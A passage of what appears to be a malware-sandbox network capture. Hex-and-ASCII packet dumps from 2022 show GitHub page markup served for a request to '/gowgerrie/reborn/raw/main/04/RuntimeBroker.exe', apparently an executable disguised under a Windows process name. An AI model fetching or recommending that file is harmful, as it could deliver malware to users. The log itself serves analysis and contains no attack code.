73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 73
                                                                                              Data Ascii: 17231a98525.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-CejWN1w/QjbOG5EH1fhNyPkPpg4nInnprTALGEaox9Elu1bcW2zEoX+fELCZABRe4/cmv+6Tna/5OIpxsXd6+A==" src="https://github.githubassets.com/assets/s
                                                                                              2022-08-10 04:47:59 UTC264INData Raw: 34 38 20 30 20 31 2e 30 37 2d 2e 30 31 20 31 2e 39 33 2d 2e 30 31 20 32 2e 32 20 30 20 2e 32 31 2e 31 35 2e 34 36 2e 35 35 2e 33 38 41 38 2e 30 31 33 20 38 2e 30 31 33 20 30 20 30 30 31 36 20 38 63 30 2d 34 2e 34 32 2d 33 2e 35 38 2d 38 2d 38 2d 38 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 6e 6f 6e 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 20 77 69 64 74 68 2d 66 69 74 20 70 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73
                                                                                              Data Ascii: 48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> </a> <div class="d-lg-none css-truncate css-truncate-target width-fit p-2"> </div> <div class="d-flex flex-items
                                                                                              2022-08-10 04:47:59 UTC265INData Raw: 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 74 68 72 65 65 2d 62 61 72 73 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 20 32 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 37 35 20 32 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 20 31 2e 35 48 31 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 20 32 2e 37 35 7a 6d 30 20 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 37 35 20 37 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 20 31 2e 35 48 31 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 20 37 2e 37 35 7a 4d 31 2e 37 35 20 31 32 61 2e 37 35 2e 37 35 20 30 20 31 30 30 20 31 2e 35 68 31 32 2e 35 61 2e 37 35 2e
                                                                                              Data Ascii: nent="true" class="octicon octicon-three-bars"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.
                                                                                              2022-08-10 04:47:59 UTC266INData Raw: 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 64 65 74 61 69 6c 73 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 65 74 61 69 6c 73 20 64 65 74 61 69 6c 73 2d 6f 76 65 72 6c 61 79 20 64 65 74 61 69 6c 73 2d 72 65 73 65 74 20 77 69 64 74 68 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 3c 73 75 6d 6d 61 72 79 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 73 75 6d 6d 61 72 79 20 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 70 78 2d 30 20 70 79 2d 33 20 62 6f 72 64
                                                                                              Data Ascii: items-center border-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-center"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 bord
                                                                                              2022-08-10 04:47:59 UTC268INData Raw: 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 4d 6f 62 69 6c 65 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 6d 6f 62 69 6c 65 22 3e 0a 20 20 20 20 20 20 4d 6f 62 69 6c 65 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61
                                                                                              Data Ascii: ot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/RuntimeBroker.exe;ref_cta:Mobile;&quot;}" href="/mobile"> Mobile</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--seconda
                                                                                              2022-08-10 04:47:59 UTC269INData Raw: 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 63 6f 70 69 6c 6f 74 22 3e 0a 20 20 20 20 20 20 43 6f 70 69 6c 6f 74 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71
                                                                                              Data Ascii: href="/features/copilot"> Copilot</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&q
                                                                                              2022-08-10 04:47:59 UTC270INData Raw: 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 49 73 73 75 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f
                                                                                              Data Ascii: lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to Issues&quot;,&quot;label&quot;:&quot;ref_
                                                                                              2022-08-10 04:47:59 UTC272INData Raw: 6f 6c 64 20 62 6f 72 64 65 72 2d 74 6f 70 20 70 74 2d 34 20 70 62 2d 32 20 6d 74 2d 33 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 47 69 74 48 75 62 20 53 70 6f 6e 73 6f 72 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 52 75 6e 74 69
                                                                                              Data Ascii: old border-top pt-4 pb-2 mt-3" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to GitHub Sponsors&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/Runti
                                                                                              2022-08-10 04:47:59 UTC273INData Raw: 22 20 68 72 65 66 3d 22 2f 74 65 61 6d 22 3e 54 65 61 6d 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 30 20 6d 72 2d 6c 67 2d 33 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20
                                                                                              Data Ascii: " href="/team">Team</a></li> <li class="mr-0 mr-lg-3 position-relative flex-wrap flex-justify-between flex-items-center border-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-center"> <a class="HeaderMenu-link
                                                                                              2022-08-10 04:47:59 UTC274INData Raw: 35 20 70 62 2d 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 62 6f 6c 64 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20
                                                                                              Data Ascii: 5 pb-1"> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--primary text-bold py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click
                                                                                              2022-08-10 04:47:59 UTC276INData Raw: 6f 6e 73 22 3e 0a 20 20 20 20 20 20 43 6f 6c 6c 65 63 74 69 6f 6e 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f
                                                                                              Data Ascii: ons"> Collections</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;actio
                                                                                              2022-08-10 04:47:59 UTC277INData Raw: 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67
                                                                                              Data Ascii: tra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click to go to Open source guides&quot;,&quot;label&quot;:&quot;ref_pag
                                                                                              2022-08-10 04:47:59 UTC278INData Raw: 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f
                                                                                              Data Ascii: s</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click to
                                                                                              2022-08-10 04:47:59 UTC280INData Raw: 72 6f 67 72 61 6d 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 65 74 61 69 6c 73 3e 0a 3c 2f 6c 69 3e 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 30 20 6d 72 2d 6c 67 2d 33 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65
                                                                                              Data Ascii: rogram</a> </li> </ul> </div> </details></li> <li class="mr-0 mr-lg-3 position-relative flex-wrap flex-justify-between flex-items-center border-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-ce
                                                                                              2022-08-10 04:47:59 UTC281INData Raw: 6e 34 22 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 20 66 35 20 70 62 2d 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 62 6f 6c 64 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 69 63
                                                                                              Data Ascii: n4"> <ul class="list-style-none f5 pb-1"> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--primary text-bold py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Pric
                                                                                              2022-08-10 04:47:59 UTC282INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 62 6f 6c 64 20 62 6f 72 64 65 72 2d 74 6f 70 20 70 74 2d 34 20 70 62 2d 32 20 6d 74 2d 33 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 69 63 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75
                                                                                              Data Ascii: <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--primary text-bold border-top pt-4 pb-2 mt-3" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Pricing&quot;,&quot;action&quot;:&qu
                                                                                              2022-08-10 04:47:59 UTC284INData Raw: 72 63 68 2d 77 72 61 70 70 65 72 2d 6a 75 6d 70 2d 74 6f 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 0a 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 69 6e 70 75 74 2d 73 6d 20 68 65 61 64 65 72 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 20 6a 75 6d 70 2d 74 6f 2d 66 69 65 6c 64 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 66 69 65 6c 64 20 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 63 75 73 20 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 69 65 6c 64 20 69 73 2d 63 6c 65 61 72 61 62
                                                                                              Data Ascii: rch-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearab
                                                                                              2022-08-10 04:47:59 UTC285INData Raw: 31 2e 33 2d 33 2d 33 76 2d 31 33 63 30 2d 31 2e 37 20 31 2e 33 2d 33 20 33 2d 33 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 39 37 39 41 39 43 22 20 64 3d 22 4d 31 31 2e 38 20 36 4c 38 20 31 35 2e 31 68 2d 2e 39 4c 31 30 2e 38 20 36 68 31 7a 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 6f 78 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 64 2d 6e 6f 6e 65 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 2d
                                                                                              Data Ascii: 1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <ul class="d-
                                                                                              2022-08-10 04:47:59 UTC286INData Raw: 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31
                                                                                              Data Ascii: ="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1
                                                                                              2022-08-10 04:47:59 UTC288INData Raw: 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65 72 0a 20 20 20 20 20 20 3c 2f 73 70
                                                                                              Data Ascii: </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </sp
                                                                                              2022-08-10 04:47:59 UTC289INData Raw: 6e 74 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61 74 68 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 73 63 6f 70 65 64 5f 73 65 61 72 63 68 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 